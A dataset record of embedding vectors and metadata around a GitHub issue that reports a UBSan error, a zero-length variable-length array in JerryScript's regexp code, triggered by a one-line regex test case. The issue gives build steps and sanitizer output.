-0.018424395471811295, -0.014805869199335575, 0.005366066470742226, 0.014937031082808971, -0.010330932214856148, -0.01802319474518299, -0.004255047999322414, -0.001155382371507585, 0.010925018228590488, -0.02286847122013569, -0.012977316975593567, -0.010971310548484325, 0.004617671947926283, -0.006581243593245745, 0.012120906263589859, -0.005524232517927885, 0.025831187143921852, -0.008919011801481247, 0.006523377727717161, 0.012907878495752811, -0.0024438556283712387, 0.0113570811226964, 0.0013251213822513819, -0.0016308444319292903, 0.00007317582640098408, 0.011063896119594574, 0.01580115593969822, 0.001151524716988206, -0.023408548906445503, 0.01728251576423645, 0.004764264915138483, 0.00522333150729537, 0.022621577605605125, -0.03228126838803291, 0.0010560465743765235, -0.007522523403167725, -0.005358351394534111, -0.017961470410227776, 0.025198524817824364, 0.001452425611205399, -0.008000878617167473, 0.004744976293295622, 0.010330932214856148, -0.018439825624227524, 0.023192517459392548, -0.006338207982480526, -0.0031343847513198853, 0.015253362245857716, -0.010624117217957973, 0.021433405578136444, 0.006241765338927507, 0.021248234435915947, 0.0027582584880292416, -0.01098674163222313, 0.0022509703412652016, 0.001840124954469502, 0.014250359497964382, -0.021309958770871162, 0.006581243593245745, 0.006700832396745682, 0.009559391066432, 0.021387111395597458, -0.00392135651782155, 0.02286847122013569, -0.012738139368593693, 0.010037746280431747, 0.02708108350634575, -0.016742436215281487, -0.012213491834700108, -0.008008593693375587, 0.00338320666924119, -0.0178688857704401, -0.01256068516522646, -0.007213906850665808, 0.020245231688022614, 0.008702980354428291, -0.011804575100541115, 0.018748441711068153, 0.0016674926737323403, 0.011603974737226963, -0.008124325424432755, 0.0031826060730963945, -0.025013353675603867, 0.0037516173906624317, -0.011249065399169922, -0.0005005371058359742, -0.005288912449032068, 0.007769416552037001, -0.0017292159609496593, -0.009374220855534077, 0.0004072289157193154, 0.0022085357923060656, -0.003064946038648486, -0.038854796439409256, 0.008949873968958855, 0.03095421940088272, -0.011742851696908474, -0.02451956830918789, -0.014011181890964508, 0.009605683386325836, 0.0009403154253959656, -0.006226334720849991, -0.002546084811910987, 0.011696559377014637, 0.014327513985335827, 0.013478818349540234, 0.0031999656930565834, 0.005574382841587067, -0.005659251939505339, 0.0031170251313596964, 0.00003263979306211695, -0.024411551654338837, -0.00014695442223455757, 0.016958467662334442, -0.01968972198665142, -0.0178688857704401, 0.011928021907806396, 0.020214369520545006, 0.006843567360192537, 0.028500718995928764, 0.020368678495287895, -0.012012890540063381, -0.03650931268930435, -0.00782342441380024, -0.001017469447106123, -0.01278443168848753, -0.0014148129848763347, -0.02647928148508072, 0.00850237999111414, -0.01712820678949356, 0.009081035852432251, 0.024118367582559586, -0.0022355394903570414, 0.006878286600112915, -0.011472812853753567, 0.00901931244879961, -0.001988646574318409, 0.014381521381437778, 0.004455648362636566, 0.03950289264321327, -0.011056180112063885, -0.020847033709287643, -0.0015700856456533074, -0.01939653605222702, 0.0003368257894180715, 0.00033634359715506434, -0.02541455626487732, -0.014535829424858093, 0.0012576115550473332, -0.009204482659697533, 0.006106745917350054, -0.015832018107175827, -0.023640012368559837, 0.00013176471111364663, 0.03175662085413933, 0.015592840500175953, -0.03095421940088272, 0.012892447412014008, 0.009505383670330048, -0.01007632352411747, 0.009574822150170803, -0.01774543896317482, 0.002760187489911914, -0.007024879567325115, 0.005389212630689144, -0.002982005476951599, -0.020847033709287643, -0.0015488682547584176, -0.006866713520139456, 0.008772419765591621, 0.004447932820767164, -0.0062687695026397705, -0.020939618349075317, 0.007483946159482002, -0.004243474453687668, 0.0010232561035081744, 0.015145346522331238, -0.01610977202653885, 0.013910881243646145, -0.014558975584805012, 0.011218204163014889, -0.007896720431745052, 0.016572697088122368, 0.0061414651572704315, 0.007048025727272034, -0.003502795472741127, -0.0008810032159090042, 0.02132538892328739, -0.0023917765356600285, -0.02481275424361229, 0.00901931244879961, 0.0007667187019251287, 0.022745024412870407, 0.005747979506850243, 0.017035622149705887, -0.0038114117924124002, -0.012606977485120296, -0.008633541874587536, 0.0037111113779246807, 0.00466396426782012, -0.005304343532770872, -0.005647678859531879, -0.004447932820767164, 0.0048799957148730755, 0.003564518643543124, 0.008386649191379547, -0.016341235488653183, 0.006291915662586689, 0.0033041236456483603, 0.01623321883380413, 0.006978586781769991, -0.015006469562649727, 0.011426519602537155, 0.024751029908657074, 0.021448835730552673, 0.017220791429281235, 0.008309494704008102, -0.00834035687148571, -0.000411086599342525, -0.02209693007171154, -0.021016772836446762, -0.0029858630150556564, -0.02286847122013569, -0.0003749206371139735, -0.0021063066087663174, 0.0006948689697310328, 0.012614692561328411, 0.0025152231100946665, 0.008965305052697659, 0.026571866124868393, 0.014612983912229538, 0.010253777727484703, -0.010886440984904766, 0.01338623370975256, 0.007433796301484108, 0.0124758156016469, 0.008633541874587536, -0.005408501252532005, -0.0006649717688560486, 0.006249480880796909, 0.02103220298886299, 0.006967013701796532, 0.0017079985700547695, -0.0003691340680234134, -0.008780134841799736, -0.007588104344904423, -0.009675121866166592, -0.014906168915331364, 0.017189929261803627, 0.0021178796887397766, -0.012190345674753189, 0.0150990542024374, 0.008772419765591621, -0.03478106111288071, -0.00932792853564024, -0.022914763540029526, 0.0001603358396096155, 0.0031922501511871815, -0.016665281727910042, 0.00375933269970119, 0.017097344622015953, 0.002303049433976412, -0.004019727930426598, 0.0022432550322264433, -0.004536660388112068, -0.004837560933083296, -0.018594134598970413, -0.002694606315344572, -0.007977732457220554, 0.011820006184279919, -0.01712820678949356, 0.013710280880331993, 0.008317210711538792, -0.0035760917235165834, -0.01195888314396143, -0.012985032051801682, -0.0037574039306491613, 0.018131209537386894, -0.007190760690718889, -0.002223966410383582, 0.005450936034321785, 0.0056283907033503056, -0.00710589112713933, 0.002681104466319084, 0.01908791996538639, 0.025136800482869148, 0.018918180838227272, -0.0077424123883247375, -0.007271772716194391, -0.011912590824067593, -0.013424810953438282, 0.019334813579916954, -0.005076739005744457, -0.008409795351326466, 0.006257196422666311, 0.015222501009702682, 0.0023667016066610813, 0.012514392845332623, 0.016433820128440857, 0.002615523524582386, 0.009289352223277092, -0.023393118754029274, -0.00680884812027216, 0.005196327809244394, -0.03323797881603241, -0.001029042643494904, -0.0285470113158226, 0.006585101131349802, 0.013663988560438156, -0.002806479809805751, 0.009798568673431873, 0.01654183492064476, 0.01166569720953703, -0.01607891172170639, -0.00804717093706131, 0.019350243732333183, 0.02058470994234085, 0.006114460993558168, -0.011750566773116589, -0.0020850892178714275, 0.00895758904516697, -0.004806699696928263, 0.014798153191804886, 0.013818296603858471, -0.006870571058243513, 0.009713699109852314, -0.0036493882071226835, -0.010801571421325207, 0.010778425261378288, -0.0246584452688694, 0.0019028126262128353, 0.016788728535175323, 0.037064820528030396, -0.008031739853322506, 0.008209194988012314, 0.029673460870981216, 0.005215615965425968, -0.002636740915477276, -0.026988498866558075, 0.02317708730697632, -0.011465096846222878, -0.0032539735548198223, -0.008888150565326214, -0.011349366046488285, 0.001524757593870163, -0.02539912424981594, -0.005462509114295244, -0.008054886013269424, 0.02995121479034424, 0.009127328172326088, -0.009559391066432, -0.0036898942198604345, 0.02720453031361103, 0.020955048501491547, 0.002175745088607073, 0.001962607027962804, 0.012452669441699982, -0.003977293148636818, 0.022019775584340096, 0.0008106001187115908, -0.0010801572352647781, -0.001687745563685894, -0.0039541469886898994, 0.0057672676630318165, 0.011750566773116589, -0.00031609064899384975, -0.010639548301696777, 0.0027119661681354046, 0.005921576172113419, -0.009868007153272629, 0.004548233468085527, 0.020553847774863243, 0.007206191308796406, -0.0021525989286601543, -0.011719705536961555, 0.0008853431208990514, 0.010585539974272251, 0.0141269126906991, 0.024612152948975563, 0.013316795229911804, 0.015345947816967964, -0.0006370033952407539, 0.0057672676630318165, 0.004212613217532635, 0.023840611800551414, -0.004548233468085527, 0.009675121866166592, 0.014720999635756016, 0.029874062165617943, 0.013563687913119793, -0.0018237297190353274, 0.00984486099332571, -0.0053004855290055275, 0.0013916668249294162, -0.021834606304764748, 0.0001722706074360758, 0.0023609150666743517, -0.005960152950137854, 0.011542251333594322, 0.014612983912229538, -0.011519105173647404, -0.0006640073261223733, 0.0024573577102273703, -0.020924188196659088, -0.016927605494856834, -0.0042859092354774475, 0.01640295796096325, 0.021155649796128273, 0.012113191187381744, 0.01307761762291193, -0.019473690539598465, 0.031478866934776306, -0.009435944259166718, -0.017405960708856583, -0.00522333150729537, 0.02089332602918148, 0.0077964202500879765, -0.000836639606859535, 0.0007561100064776838, -0.01210547611117363, -0.0003961379989050329, -0.009073320776224136, -0.001782259321771562, 0.0285470113158226, 0.007410649675875902, 0.005578240379691124, -0.009976022876799107, -0.007395219057798386, 0.007217764854431152, -0.006411504466086626, 0.015970895066857338, 0.005713259801268578, -0.0011457381770014763, -0.029195105656981468, -0.008309494704008102, -0.012576116248965263, -0.012051467783749104, -0.0010222916025668383, 0.022220376878976822, 0.014173205010592937, 0.014342944137752056, 0.005790414288640022, -0.012128622271120548, 0.0007517701014876366, -0.009351074695587158, -0.0035625898744910955, 0.0036744633689522743, -0.03697223588824272, -0.009073320776224136, 0.018424395471811295, -0.009258490055799484, 0.015600555576384068, 0.008024024777114391, -0.011411089450120926, -0.004212613217532635, -0.00231076474301517, -0.0036493882071226835, -0.0009943232871592045, 0.030877064913511276, -0.012228921987116337, 0.028145810589194298, -0.00976770743727684, -0.005354493390768766, -0.013494249433279037, -0.007819566875696182, 0.014196351170539856, -0.0097059840336442, 0.025167662650346756, -0.01638752780854702, -0.00947452150285244, -0.0011245207861065865, -0.00842522643506527, -0.025769464671611786, 0.004899284336715937, 0.007642112206667662, 0.0013338011922314763, 0.039039965718984604, -0.005697829183191061, 0.016727006062865257, -0.01353282667696476, -0.0026753179263323545, 0.01881016604602337, -0.023238809779286385, -0.010979026556015015, 0.0010666552698239684, -0.009227628819644451, 0.012190345674753189, 0.025615155696868896, 0.005146177485585213, 0.025152232497930527, 0.005377639550715685, 0.02422638237476349, -0.007468515541404486, -0.032713331282138824, 0.009937446564435959, -0.030151816084980965, -0.0021101641468703747, 0.02407207526266575, 0.017529407516121864, -0.032559022307395935, 0.008726127445697784, 0.01729794591665268, 0.00339863752014935, -0.028037793934345245, -0.005431647412478924, 0.031015941873192787, -0.021171079948544502, 0.02149512805044651, 0.018146641552448273, -0.008409795351326466, 0.007360499817878008, 0.0034912223927676678, 0.020229801535606384, 0.011827721260488033, 0.01225206907838583, 0.031941790133714676, 0.005042019300162792, 0.01907248981297016, -0.02434982918202877, 0.01681959070265293, 0.00620704609900713, -0.011935736984014511, -0.019597137346863747, 0.0020947332959622145, -0.02391776628792286, 0.009358790703117847, 0.006041164975613356, 0.006473227869719267, 0.010246062651276588, 0.0115036740899086, 0.013501964509487152, 0.010847864672541618, 0.0043206289410591125, 0.005003442522138357, 0.0009952876716852188, 0.01127221155911684, 0.02512137033045292, -0.005323631688952446, -0.0008843786781653762, -0.02163400501012802, 0.0048529920168221, 0.053298041224479675, 0.009119613096117973, -0.0036995382979512215, 0.01894904300570488, -0.001357911853119731, 0.015075908042490482, -0.007769416552037001, -0.007233195472508669, -0.006886002141982317, -0.022606147453188896, 0.0021159506868571043, 0.005373782012611628, -0.0006914935074746609, -0.00842522643506527, -0.017637424170970917, 0.003223111853003502, 0.013116194866597652, 0.032096099108457565, -0.01939653605222702, -0.03922513499855995, -0.00069535116199404, 0.005647678859531879, 0.026216957718133926, -0.0034430010709911585, 0.014096051454544067, -0.009883438237011433, -0.0026791756972670555, 0.03021354041993618, -0.0029569303151220083, 0.0026097369845956564, 0.04589125141501427, -0.021603142842650414, -0.0013530898140743375, 0.025908341631293297, 0.009690552949905396, 0.010431231930851936, 0.005655394401401281, 0.0194119680672884, 0.008988451212644577, -0.0018777375807985663, 0.005998730193823576, 0.016202358528971672, 0.011395658366382122, 0.02870132029056549, 0.01607891172170639, 0.013648557476699352, -0.004143174272030592, 0.023871473968029022, 0.014157774858176708, -0.0000056961412155942526, 0.019890323281288147, -0.001238323049619794, -0.005690113641321659, -0.000521754496730864, -0.004679395351558924, 0.03038327768445015, 0.010732132941484451, -0.016757866367697716, 0.0048529920168221, -0.030136385932564735, 0.00280262203887105, -0.01759113185107708, -0.00045737906475551426, -0.007661400828510523, -0.03657103702425957, 0.014072905294597149, -0.009451375342905521, 0.017560269683599472, 0.0035973091144114733, 0.01910335198044777, -0.009883438237011433, -0.019180504605174065, -0.015245647169649601, 0.014836730435490608, 0.021726589649915695, -0.039472028613090515, 0.0013935957103967667, -0.029195105656981468, -0.008834143169224262, -0.012830724008381367, 0.022066067904233932, 0.0112104881554842, 0.0073296381160616875, -0.011249065399169922, -0.028932781890034676, -0.00999145396053791, -0.003279048716649413, -0.0033677758183330297, 0.0068628559820353985, 0.019010767340660095, 0.021711159497499466, 0.019766876474022865, -0.015724003314971924, -0.02661815844476223, -0.0003334502980578691, -0.011843152344226837, -0.00703259464353323, -0.011966598220169544, 0.00748780369758606, 0.012452669441699982, 0.017560269683599472, 0.002281832043081522, 0.0008988450863398612, -0.0010762994643300772, 0.0088804354891181, 0.027019361034035683, -0.0032481870148330927, 0.008911296725273132, -0.004031301010400057, 0.013772004283964634, -0.003938715904951096, 0.0010039674816653132, 0.018300948664546013, 0.0034102106001228094, 0.007564958184957504, 0.0011505603324621916, 0.0018275873735547066, 0.009821714833378792, -0.011526820249855518, 0.012375514954328537, 0.0008877541986294091, 0.0002994542883243412, 0.04215699061751366, 0.008178332820534706, 0.026093510910868645, -0.002108235377818346, 0.008031739853322506, 0.025445416569709778, 0.014350660145282745, 0.0031922501511871815, 0.0116502670571208, -0.010832433588802814, 0.013555972836911678, -0.005234904587268829, -0.00556280929595232, 0.012259784154593945, -0.008533242158591747, 0.044101275503635406, 0.02887105941772461, -0.008718411438167095, 0.021140219643712044, 0.06474770605564117, 0.0016038405010476708, 0.003375491127371788, -0.014111482538282871, 0.012776716612279415, 0.0066892593167722225, -0.011765997856855392, -0.009636545553803444, -0.021618574857711792, 0.03518226370215416, 0.02661815844476223, 0.011156480759382248, 0.01497560739517212, -0.015569694340229034, 0.0028990646824240685, 0.021402543410658836, 0.004116170573979616, 0.0028392702806741, 0.009559391066432, -0.012336937710642815, 0.034811921417713165, -0.00878784991800785, -0.000996252172626555, -0.013563687913119793, -0.014042043127119541, 0.010477524250745773, -0.011619404889643192, -0.005018873140215874, -0.013964889571070671, 0.007152183447033167, -0.029426567256450653, 0.004837560933083296, -0.02254442311823368, 0.01712820678949356, 0.025460848584771156, 0.016449250280857086, -0.015970895066857338, 0.020090924575924873, 0.00023327054805122316, -0.009381936863064766, 0.00006974006100790575, 0.010192054323852062, -0.008525526151061058, 0.03237385302782059, -0.00969826802611351, -0.005832848604768515, -0.012568400241434574, 0.0014312082203105092, -0.004147032275795937, -0.012198060750961304, -0.007013306487351656, 0.01566227898001671, 0.004108455032110214, 0.0008646079804748297, 0.011997460387647152, 0.006500231567770243, -0.004648533649742603, 0.02030695602297783, 0.009744561277329922, 0.0098525770008564, -0.017251653596758842, -0.03363918140530586, 0.0027447566390037537 ]
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
<!-- First of all, when reporting a bug, give the issue a descriptive title. In the body of the issue, optionally give a free-form text description of the bug. Give the context necessary for others to understand the problem. Then, provide information necessary to reproduce the bug. Omit sections that are irrelevant for the bug report, but note that information like git revision, build platform, build command, and test case are required in almost all cases. --> ###### JerryScript revision <!-- Identify the git hash(es) or tag(s) where the issue was observed. --> ccc1525 ###### Build platform <!-- Name the build platform. E.g., copy the output of `echo "$(lsb_release -ds) ($(uname -mrs))"` (on Linux), `echo "$(sw_vers -productName) $(sw_vers -productVersion) ($(uname -mrs))"` (on macOS), or `python -c "import platform; print(platform.platform())"` (should work everywhere). --> Ubuntu 20.04.1 LTS (Linux 5.4.0-74-generic x86_64) ###### Build steps <!-- Describe how to build JerryScript. Give all the necessary details of the build (e.g., environment variables, command(s), profile, command line options, etc.). E.g.: ```sh tools/build.py --clean --debug ``` Or: ```sh mkdir build && cmake -H. -Bbuild && make -C build ``` Even if the bug was originally observed when JerryScript was integrated into a larger project, try to reproduce it with as few external code as possible, preferably by building the `jerry` command line tool. --> ```sh readonly FLAGS=( "-g -O1 -fsanitize=address,undefined -fno-sanitize-recover=undefined,address" ) cmake -D CMAKE_C_FLAGS="${FLAG}" -D CMAKE_BUILD_TYPE=Debug -D CMAKE_INSTALL_PREFIX:PATH="${INSTALL_DIR}" "${SRC_FOLDER}" make make install ``` <!-- ###### Build log Copy the build log if the reported issue is a build problem. Do a verbose build if necessary. Try and trim the log to relevant parts. --> ###### Test case <!-- Give the JavaScript input that should be passed to the engine to trigger the bug. Try and post a reduced test case that is minimally necessary to reproduce the issue. As a rule of thumb, use Markdown's fenced code block syntax for the test case. Attach the file (renamed to .txt) if the test case contains 'problematic' bytes that cannot be copied in the bug report directly. --> ```javascript "" . match ( /(?:(?=a)b){5}abcde/ ) ; ``` <!-- ###### Execution platform Unnecessary if the same as the build platform. --> <!-- ###### Execution steps List the steps that trigger the bug. E.g., if a bug is snapshot-specific: ```sh build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot ``` Unnecessary if trivial (i.e., `build/bin/jerry testcase.js`). --> ###### Output <!-- Copy relevant output from the standard output and/or error channels. --> ``` jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1343:9: runtime error: variable length array bound evaluates to non-positive value 0 ``` <!-- ###### Backtrace In case of a crash (assertion failure, etc.), try to copy the backtrace from a debugger at the point of failure. --> ###### Expected behavior <!-- Describe what should happen instead of current behavior. Unnecessary if trivial (e.g., in case of a crash, the trivial expected behavior is not to crash). --> According to C99 standard (6.7.5.2/5): > If the size is an expression that is not an integer constant expression: if it occurs in a declaration at function prototype scope, it is treated as if it were replaced by *; otherwise, each time it is evaluated it shall have a value greater than zero
ubsan: jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1343:9: runtime error: variable length array bound evaluates to non-positive value 0
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4700/comments
0
2021-06-30T08:36:08
2021-06-30T08:36:08Z
https://github.com/jerryscript-project/jerryscript/issues/4700
933,445,635
4,700
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : ubsan: jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1343:9: runtime error: variable length array bound evaluates to non-positive value 0 Issue date: --- start body --- <!-- First of all, when reporting a bug, give the issue a descriptive title. In the body of the issue, optionally give a free-form text description of the bug. Give the context necessary for others to understand the problem. Then, provide information necessary to reproduce the bug. Omit sections that are irrelevant for the bug report, but note that information like git revision, build platform, build command, and test case are required in almost all cases. --> ###### JerryScript revision <!-- Identify the git hash(es) or tag(s) where the issue was observed. --> ccc1525 ###### Build platform <!-- Name the build platform. E.g., copy the output of `echo "$(lsb_release -ds) ($(uname -mrs))"` (on Linux), `echo "$(sw_vers -productName) $(sw_vers -productVersion) ($(uname -mrs))"` (on macOS), or `python -c "import platform; print(platform.platform())"` (should work everywhere). --> Ubuntu 20.04.1 LTS (Linux 5.4.0-74-generic x86_64) ###### Build steps <!-- Describe how to build JerryScript. Give all the necessary details of the build (e.g., environment variables, command(s), profile, command line options, etc.). E.g.: ```sh tools/build.py --clean --debug ``` Or: ```sh mkdir build && cmake -H. -Bbuild && make -C build ``` Even if the bug was originally observed when JerryScript was integrated into a larger project, try to reproduce it with as few external code as possible, preferably by building the `jerry` command line tool. --> ```sh readonly FLAGS=( "-g -O1 -fsanitize=address,undefined -fno-sanitize-recover=undefined,address" ) cmake -D CMAKE_C_FLAGS="${FLAG}" -D CMAKE_BUILD_TYPE=Debug -D CMAKE_INSTALL_PREFIX:PATH="${INSTALL_DIR}" "${SRC_FOLDER}" make make install ``` <!-- ###### Build log Copy the build log if the reported issue is a build problem. Do a verbose build if necessary. Try and trim the log to relevant parts. --> ###### Test case <!-- Give the JavaScript input that should be passed to the engine to trigger the bug. Try and post a reduced test case that is minimally necessary to reproduce the issue. As a rule of thumb, use Markdown's fenced code block syntax for the test case. Attach the file (renamed to .txt) if the test case contains 'problematic' bytes that cannot be copied in the bug report directly. --> ```javascript "" . match ( /(?:(?=a)b){5}abcde/ ) ; ``` <!-- ###### Execution platform Unnecessary if the same as the build platform. --> <!-- ###### Execution steps List the steps that trigger the bug. E.g., if a bug is snapshot-specific: ```sh build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot ``` Unnecessary if trivial (i.e., `build/bin/jerry testcase.js`). --> ###### Output <!-- Copy relevant output from the standard output and/or error channels. --> ``` jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:1343:9: runtime error: variable length array bound evaluates to non-positive value 0 ``` <!-- ###### Backtrace In case of a crash (assertion failure, etc.), try to copy the backtrace from a debugger at the point of failure. --> ###### Expected behavior <!-- Describe what should happen instead of current behavior. Unnecessary if trivial (e.g., in case of a crash, the trivial expected behavior is not to crash). --> According to C99 standard (6.7.5.2/5): > If the size is an expression that is not an integer constant expression: if it occurs in a declaration at function prototype scope, it is treated as if it were replaced by *; otherwise, each time it is evaluated it shall have a value greater than zero --- end body ---
3,955
[ -0.0034153813030570745, 0.0037314856890589, 0.00024184714129660279, 0.013567056506872177, 0.038019731640815735, 0.00802977941930294, -0.007542905863374472, 0.03970562294125557, -0.045809708535671234, -0.011997435241937637, -0.006209453567862511, 0.0004737024719361216, 0.00021879785344935954, 0.016553698107600212, 0.017818115651607513, 0.025608092546463013, -0.03976375609636307, 0.009657535701990128, -0.03522929549217224, -0.013537989929318428, 0.008792789652943611, 0.016989704221487045, -0.02648010477423668, 0.06150592863559723, -0.03238071873784065, 0.00048823602264747024, 0.013755992986261845, 0.005326541140675545, -0.01374145969748497, -0.019009865820407867, 0.013690591789782047, 0.005170305725187063, -0.0220183078199625, 0.013821394182741642, 0.03264232352375984, 0.010791150853037834, 0.03767092898488045, 0.055343709886074066, -0.011452427133917809, -0.003804153297096491, -0.005359241738915443, -0.034880489110946655, -0.0009664802346378565, 0.030491361394524574, 0.02621849998831749, 0.047321196645498276, 0.03397940844297409, 0.008422184735536575, -0.03395034372806549, 0.02230897918343544, -0.014955009333789349, -0.018573859706521034, 0.02278858609497547, -0.051884725689888, 0.010682149790227413, -0.03240978717803955, 0.015899689868092537, 0.017541978508234024, 0.04392034932971001, 0.024329140782356262, 0.018617460504174232, 0.011764897964894772, -0.009679336100816727, 0.0009301463724114001, -0.00233444944024086, 0.03583970293402672, -0.016277560964226723, 0.009679336100816727, 0.021625902503728867, 0.023006588220596313, -0.00869105476886034, -0.027293981984257698, 0.02024521678686142, 0.04647825285792351, -0.007811776362359524, -0.013537989929318428, 0.00986827164888382, 0.03197378292679787, -0.006136786192655563, 0.005064937751740217, -0.0068634627386927605, 0.01244070753455162, 0.005904249381273985, -0.00805157981812954, -0.023675132542848587, -0.0007684607990086079, 0.0024162004701793194, -0.06633106619119644, -0.012026501819491386, -0.017018772661685944, -0.018472125753760338, 0.042118191719055176, -0.010507747530937195, 0.013763259164988995, -0.013014782220125198, 0.0285002663731575, -0.030665762722492218, 0.006216720677912235, -0.04435635358095169, 0.01259330939501524, 0.010515013709664345, -0.0026905210688710213, -0.01661183312535286, 0.007862643338739872, 0.02879093773663044, 0.02153870277106762, 0.024983150884509087, -0.01075481716543436, 0.03034602478146553, 0.1039438545703888, 0.0051339720375835896, -0.00946859922260046, -0.03220631927251816, -0.015885155647993088, -0.0337178073823452, 0.026552772149443626, 0.012724111787974834, -0.0097156697884202, -0.034095678478479385, 0.049152422696352005, -0.027628254145383835, -0.012949381954967976, -0.004294660408049822, -0.014039397239685059, -0.036159440875053406, 0.019562140107154846, 0.019024400040507317, 0.006438356824219227, 0.021684037521481514, -0.03418288007378578, -0.02748291939496994, -0.024271007627248764, 0.022774051874876022, -0.028602000325918198, 0.021989241242408752, -0.01607409119606018, -0.03909521549940109, 0.02746838517487049, -0.00868378859013319, -0.04848387837409973, -0.026843443512916565, -0.008262315765023232, 0.020056281238794327, -0.004828767850995064, -0.038281336426734924, 0.00895992573350668, -0.018472125753760338, 0.030491361394524574, -0.005141238681972027, -0.014053930528461933, -0.012011968530714512, -0.003746019210666418, 0.024794213473796844, 0.0006281213136389852, 0.05548904463648796, -0.0073794033378362656, -0.010427813045680523, 0.03240978717803955, 0.022207245230674744, -0.008000711910426617, -0.023166457191109657, 0.0004505396354943514, -0.011336158961057663, -0.009134327992796898, -0.04522836580872536, 0.013690591789782047, -0.031043635681271553, 0.015391015447676182, 0.020841091871261597, 0.016001423820853233, -0.030520427972078323, 0.02259965054690838, 0.00013659254182130098, 0.04726306349039078, -0.014213799498975277, 0.0042692264541983604, -0.017207708209753036, 0.02621849998831749, 0.018355857580900192, -0.005519110709428787, 0.00623125396668911, -0.004272860009223223, 0.005439176224172115, -0.02908160723745823, 0.01608862541615963, -0.017076905816793442, 0.010856552049517632, -0.034357283264398575, 0.03706051781773567, -0.028325863182544708, 0.010544081218540668, -0.012491575442254543, -0.008887258358299732, -0.011365225538611412, 0.02979375049471855, 0.034909557551145554, -0.033369001001119614, -0.028863605111837387, -0.00921426247805357, 0.005519110709428787, 0.036188505589962006, -0.0076664406806230545, -0.005228439811617136, -0.00158597226254642, 0.0010291561484336853, 0.0007294018869288266, -0.013552523218095303, 0.005806148052215576, 0.012847647070884705, -0.007884443737566471, -0.01374872587621212, -0.03586876764893532, 0.007423004135489464, -0.02124803140759468, -0.01347258873283863, 0.007826309651136398, -0.005606311839073896, -0.01735304296016693, -0.030927367508411407, -0.011336158961057663, 0.02023068442940712, -0.011823032051324844, -0.0207538902759552, -0.02046322077512741, -0.04540276899933815, -0.012259038165211678, -0.01012260839343071, -0.0010237060487270355, -0.04121711105108261, -0.013131050392985344, 0.012774978764355183, -0.009504932910203934, -0.02751198597252369, 0.00635478924959898, 0.03790346533060074, 0.0194894727319479, -0.02459074556827545, -0.019881878048181534, 0.0012925764312967658, 0.01918426901102066, -0.006507391110062599, 0.026538237929344177, -0.04900708794593811, -0.02954667992889881, 0.013697858899831772, 0.012673243880271912, -0.03793253004550934, -0.02982281893491745, -0.012106436304748058, 0.028093326836824417, -0.023922201246023178, -0.011975634843111038, 0.00667452672496438, -0.028151461854577065, -0.018617460504174232, -0.022977521643042564, 0.0005754372105002403, 0.0181669220328331, -0.0068198624067008495, 0.002381683327257633, 0.02774452231824398, 0.033078331500291824, -0.04950122535228729, 0.02338446117937565, 0.039821892976760864, 0.025026751682162285, -0.04694332554936409, 0.010972820222377777, -0.017847184091806412, -0.03833946958184242, 0.05051857605576515, -0.05888989195227623, -0.0064310901798307896, 0.018544793128967285, 0.0060168844647705555, 0.014133865013718605, -0.01140882633626461, 0.0441238172352314, 0.005337441340088844, 0.003876820905134082, 0.016742635518312454, 0.023457128554582596, 0.01896626502275467, 0.020666690543293953, -0.009432265534996986, -0.011830299161374569, 0.013588856905698776, -0.014955009333789349, 0.003967655822634697, -0.032293520867824554, -0.014635271392762661, -0.026378368958830833, -0.002138246549293399, 0.018486659973859787, -0.01074755098670721, 0.004062123596668243, 0.0029339578468352556, -0.03223538398742676, -0.01999814622104168, 0.012375306338071823, -0.03223538398742676, -0.03679891675710678, -0.015071277506649494, 0.01869012787938118, -0.05482050031423569, -0.019649341702461243, -0.0013152851024642587, -0.03522929549217224, 0.005192106124013662, -0.012891246937215328, 0.03578156977891922, -0.04130431264638901, 0.005606311839073896, -0.02908160723745823, -0.01077661756426096, -0.017222240567207336, 0.05205912888050079, -0.008007979020476341, -0.007052398752421141, -0.0013034766307100654, -0.044472623616456985, -0.043484341353178024, -0.04272859916090965, 0.023762332275509834, 0.05493677034974098, -0.005119438283145428, -0.039037082344293594, 0.037205856293439865, -0.03836853802204132, 0.008654721081256866, 0.019329603761434555, -0.039560288190841675, -0.04104270786046982, 0.009127060882747173, -0.016728101298213005, -0.0363338440656662, -0.028950806707143784, 0.014707939699292183, 0.031218037009239197, -0.010435079224407673, -0.010740283876657486, -0.012360773049294949, -0.01604502461850643, -0.0042292592115700245, 0.01284037996083498, -0.006870729848742485, 0.005006803665310144, 0.024430876597762108, 0.0018248672131448984, -0.002701421268284321, 0.0009383214637637138, 0.02052135393023491, 0.0048251342959702015, 0.004905068781226873, 0.043687812983989716, -0.0336887389421463, -0.062145404517650604, -0.01610315963625908, 0.02434367500245571, 0.035374630242586136, -0.0003656093031167984, -0.0194458719342947, 0.006518291309475899, 0.024721546098589897, 0.024532610550522804, -0.024314606562256813, -0.002795889275148511, 0.004381861537694931, -0.02278858609497547, -0.01604502461850643, -0.017745448276400566, 0.02672717534005642, -0.0009169753757305443, -0.006794428452849388, -0.012237237766385078, -0.004054856952279806, 0.008538452908396721, -0.005344708450138569, -0.016466498374938965, 0.01662636548280716, -0.02826773002743721, 0.019097067415714264, -0.004000355955213308, -0.05543091148138046, -0.000725768506526947, 0.02281765267252922, -0.02460527792572975, 0.028340397402644157, 0.039850957691669464, -0.006147686392068863, -0.010536814108490944, 0.01864652894437313, -0.0675518810749054, -0.06098272278904915, -0.01863199472427368, 0.017701847478747368, -0.02698877826333046, -0.03267139196395874, 0.008930858224630356, -0.034647952765226364, 0.008923592045903206, -0.03863014280796051, 0.025782493874430656, -0.0031846612691879272, 0.0168589036911726, 0.025273820385336876, -0.028732802718877792, -0.04025789722800255, 0.015550884418189526, 0.005024970509111881, 0.03961842134594917, 0.006071384996175766, -0.01713504083454609, 0.014642538502812386, 0.05051857605576515, 0.02515755221247673, 0.038281336426734924, -0.03496769070625305, -0.030520427972078323, 0.009432265534996986, -0.03278765827417374, -0.011997435241937637, 0.024532610550522804, 0.0014006696874275804, 0.014213799498975277, -0.014693406410515308, -0.03133430704474449, 